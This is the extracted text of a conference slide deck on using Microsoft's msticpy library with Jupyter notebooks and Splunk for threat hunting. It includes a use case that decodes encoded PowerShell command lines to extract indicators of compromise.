Practical msticpy use ~ rainbow bridge to SIEM for advanced threat hunting ~


September 08, 23




Security Engineer & Researcher



$WHOAMI • Threat Hunter/App Developer/Threat Researcher • OSS Contributor • msticpy,unprotect,atomic-red-team,cuckoo,capev2.. CSIRT Incident Handler Forensic • Qualifications • 7 GIACs • CISSP、CISA Full-stack Engineer Fighting injustice attack world ! Service Dev/Opera:on SOC Analyst MSSP Threat Researcher/binarian AI Anti-Virus


$more GoAhead Inc. CEO: Mitsuhiro Nakamura Splunk.conf 2017@USA Splunk Champion Free Splunk App/Add-ons by GoAhead Established in 2017 Data Analysis Company Splunk is our strength for Security Challenges KOBANZAME (IP Whois DB) Heuristic Logic Data Visualization Aim for maximum effectiveness with minimum resources 3


Agenda • Invariable Operation with SIEM • msticpy 101 Overview and Basics • msticpy 201 Jupyter Notebook and ( pros | cons ) • msticpy 301 Practical use case • Take Away 4


Invariable Operation with SIEM 5


Background and Issues Old fashioned Nowadays Never ending Dev & Ope tasks l Modification and addition of analytical logic to keep up with new threats l Thresholds tailored to the internal situation as well as the threat situation in the world Analysis︓Human-wave tactics for raw log Monitoring︓Alert by Email Analysis︓ Multi-axis search of formatted logs Monitoring︓Visualized Dashboard, Alert from SIEM Documen tations Modify Thresh olds Bugs Update Add Panels SIEM func:ons and exis:ng dashboards Biases some:mes lead to non-free analysis 6


Objective Advanced Threat Hunting Threat Hunting • Proactive detection and response to signs of malicious activity or threats • Investigate using threat intelligence, unapplied IOCs, anomaly detection • Iterations between hypothesis and verification Advanced Threat Hunting • Identifying undetected threats from raw data • check raw data too and look for omissions in processing and detection by security product. • Inherently data analysis with freedom (ad hoc) • • • • uniquely conceived analytical logic unrestricted external collaboration, eccentric visualization emphasis that is easy for readers to understand • Continuous update operation • Machine Learning & Deep Learning (ML/DL) • Automation 7


Security Information and Event Management First Genera+on Gartner 2005 Log and Event management integration Second Genera+on Correlation analysis with CTI Big data processing Third Generation Gartner 2017 UEBA, SOAR addition • SIEM Products • Splunk/MS Sentinel/IBM Qradar/ Exabeam/Sumo Logic/Elastic, etc. • SIEM by Security venders • Can collect/extract/search/analyze/ visualize/detect/respond • Have the individual threat hunting function • Have ML/DL extensions source: Gartner Inc, 2022 Magic Quadrant 8


SIEM’s advantage • Rapid search by indexing and field normalization (CIM, ASIM) • Statistical calculations are easy with the benefit of its search language • Can store threat intelligence • Multiple analyst can see the same data and analysis results • SIEM vendors also provide a lot of detection logic 9


SIEM's breakdown • Rapid search by indexing and field normalization (CIM, ASIM) • If extraction fails, it is missing from the search at the beginning or from the analysis along the way. • Statistical calculations are easy with the benefit of its search language • Existing some process which is not good at, and take costs for learning search language • Can store threat intelligence • Most of the intelligence is self-prepared and operational by ourselves. • Multiple analyst can see the same data and analysis results • Various limitations due to shared resources • SIEM vendors also provide a lot of detection logic • Necessary and sufficient ? No! 10


Not recommend to rely too much on SIEM analysis! • When a failure occurs, not everyone can be analyzed until recovery. • Over-reliance on analysis in SIEM search language only, forgetting how to analyze raw data • Who will ensure the integrity of the data and search results in SIEM ? • Limitations of SIEM • Default upper limits for sub search and multi value (truncate) • Default upper limit for number of plots on graph (truncate) • Difficult to notice search omissions due to misconfiguration • Don't rely solely on the logic provided by SIEM vender • Enterprise SIEMs Miss 76 Percent of MITRE ATT&CK Techniques • source: CardinalOps, ”2023 Report on State of SIEM Detection Risk” 11


For Advanced Threat Hunting msticpy Automation Infinite Visualiza:on Machine Learning Data Validation Consistent I/O Time Series Analysis SIEM 12


msticpy 101 Overview and Basics 13


Microsoft Threat Intelligence Center (MSTIC) on Python and Jupyter Notebooks msticpy • MSTICpy: OSS library developed by Microsoft's MSTIC • Written in Python, usually used on Jupyter Notebooks • Extensive functionality for infringement investigation and threat hunting • March 2019 ~ 200k+ Downloads • Presented at BlackHat USA 2020 • Frequent update recently and continues to evolve • Still few users and blog article in Asia and Japan • Fall into the following four process broadly • Only desired functions can be used piecemeal because of library-based Data Acquisition Data Processing Analysis including ML Visualization 14


msticpy’s Documentation & Resource • MSTICpy ☞ msticpy in this presentation • Official document • • • • • Word count 100k+ RST files 80+ Jupyter Notebook samples 40+ Past training resources • msticpy-lab, msticpy-training github repo • Official Blog • Time-consuming for learning with the huge resources ... 15


msticpy Capabilities Acquisition Querying Logs Visualization Data Visualization Analysis Utility Analysis Pivot Data Enrichment Security Analysis Enrichment Analysis ms@cpyconfig.yaml h"ps://twi" 16


msticpy Data Flow Diagram Internet Enrichment SIEM raw p Threat Intel Lookup p Whois, GeoIP Acquisi:on upload Local Analysis DataLake (SIEM) rich Local p Decode p Extract p ML Visualization Jupyter Notebook 17


msticpy: Data Acquisition (1) • Create instance of Query Provider • Select from data sources (left picture) LocalData: connect to .pkl files in ./data dir Splunk: connect to Splunk REST port with msticpyconfig.yaml Communication channel is NOT independently encrypted by msticpy’s uniq func => HTTPS (SSL) is necessary 18


msticpy: Data Acquisition (2) • Return: Pandas DataFrame • Ad hoc query function • exec_query(): arbitrary query • Built-in query function • select from the list varies by data source 19


msticpy: Enrichment • Threat Intel Lookup • Pivot TI function (Only on Jupyter Notebook) • TILookup class (Available on also python program) • GeoIP (MaxMind GeoLite2, IPStack) • IPWhois (Cymru, RADB, RDAP) 20


msticpy: Analysis (Utility) • Base64 Decode • IoC Extract 21


msticpy: Analysis (Pivot) • Pivot Functions being loaded by "init_notebook()" is required basically • Wrap msticpy functions and classes for ease of discovery and use • Standardization of function parameters, syntax, and output format • “.mp_pivot.” can be piped in multiple stages 22


msticpy: Analysis (Security) • Event Clustering • Classification of “process and logon events” on the host machine • Time Series Analysis • Anomaly detection in time series data considering seasonal variations • Outlier Identification • Outlier detection using decision trees • Anomalous Session • Unusual pattern detection of rare event sequences with low likelihood • Use of the event’s command name, its parameter names and values 23


msticpy: Visualization • Implemented with BokehJS • Viz charts implemented in msticpy • Timeline,ProcessTree,Folium Map,Matrix Plot, Entity/Network Graph ,etc. • Can create additional charts with MorphCharts 24


msticpy 201 Jupyter Notebook and ( pros | cons ) 25


Benefits of Analyzing with Jupyter Notebook • Reproducibility of data, it can output of intermediate results • Easy combination/integration with external sources • Easy use of ML/DL frameworks • Extensive visualization library at your disposal • Gain applied skills as a data scientist 26


Ideal Relationship between Jupyter Notebook and SIEM Advanced Threat Hunting msticpy Intelligence Knowledge Deep Analysis on denoised data SIEM Rough noise reduction 27


msticpy’s pros: Seasonal-Trend decomposition using LOESS Book: Covered in also “Machine Learning for Security Engineers Chapter 6 Anomaly Detection” 28


msticpy’s pros: Consistent I/O • Sending by Data Uploader function (Transfer) • Only Azure Sentinel and Splunk are supported as of Aug 2023 • Can upload Data Frame, File, Folder msticpy Enriching SIEM ! Visualization charts cannot be transferred. However, similar Viz can be drawn in SIEM from the transferred results. OSINT (Internet) SIEM 29


Jupyter & msticpy’s pros: Data Validation • Check the DataFrame result sequentially • Save for accidental overwriting by copy() func • Value type conversion and strip null values • Easy to validate char codes • GUI for time ranges ☞ • Pre-confirming actual Queries via Query Provider by “print” option Query to be searched 30


Jupyter’s pros: Use of much ML/DL • Only a few ML models have built-in msticpy • • • • Event Clustering ☞ DBSCAN in scikit-learn Time Series Analysis and Anomaries ☞ STL in statsmodels Outlier Identification ☞ IsolationForest in scikit-learn less parameter tuning is required since they are specialized for commonly used threat hunting applications • Flexibility to use Python's rich ML/DL library NLP ML DL 31


Jupyter’s pros: Infinite Visualization Maximum number of data plots (by default) Splunk MS Sentinel Jupyter 10,000 10,000 This Data was truncated in Splunk ! ♾ (Infinity) 32


[FYI] Change the upper limit in the dashboard options • We can change the limit with the dashboard option "” in Splunk, but... 33


Jupyter’s pros: Automation with papermill • Python library • Batch execution of Notebook files with different parameters • Introduced in the "Put it into Operation" section at the end of msticpy's training materials CUI Parameters are overwritten in the output notebook☟ Python 34


Jupyter’s cons: Security Concerns about Data Transfer • Possibility to transfer sensitive data in SIEM to external Jupyter • Handling it with SIEM’s ACL may be the only way. • Eavesdropping/MITM Attack during data transfer to the Jupyter • SSL security dependencies on the SIEM side • More complicated security design msticpy (Jupyter) ! SIEM • Transferring Threat Intelligence data to SIEM is relatively clear. 35


msticpy 301 Practical use case 36


Toward Practical msticpy Use • Push direction is fine • Intelligence collected from external sources, analyzed and processed, and transferred to SIEM • Pull direction has the security concern of data transferring. • Planning a new security design from scratch for msticpy alone is a hurdle. • SIEM vender’s advanced analytical tricks with Jupyter • MS Sentinel ☞「Microsoft Azure Machine Learning Workspace」 • Completed within Azure • Splunk ☟ 「Splunk App for Data Science and Deep Learning (DSDL)」 • Preparing machine resources such as Docker containers externally • Data exchange between containers and Splunk • Installing msticpy in container side + Store the credential strings in “Azure Key Vault” and load them from there msticpy Splunk DSDL 37


$more Splunk App for DSDL ! ! • single-instance | side-by-side • Implemented data security features • Use of proprietary SSL certificates • Custom password settings for Jupyter • Fine-grained ACL design with Splunk access tokens • Splunk MLTK commands can interact with containers • | fit ( Training to create a model ) • | apply ( Apply the trained model to the data for identification ) 38


Use Case: Powershell process command line(1) | fit Search in Splunk powershell -enc Decode base64 Required the first time for model creation Delete null byte (¥x00) Extract IoC Enrichment IoC Return to Splunk | apply Originally, this mechanism is prepared for ML/DL algorithms, so I developed a custom model incorpora@ng ms@cpy. By executing the fit command, one .py file is created in app/model directory, the file is consisting of export functions from .ipynb h]ps:// 39


Use Case: Powershell process command line(2) fit ※Example of Splunk botsv2 dataset apply msticpy results 40


Take Away • • • • • Not recommend to rely too much on SIEM analysis! msticpy's missionary work: happy to see more APAC users Let’s analyze and code on Jupyter Notebook to hone your skills! Let’s get on existing mechanisms for data security concerns! Let’s become a contributor of your favorite OSS. Happy msticpying! 41


Thank you ! 43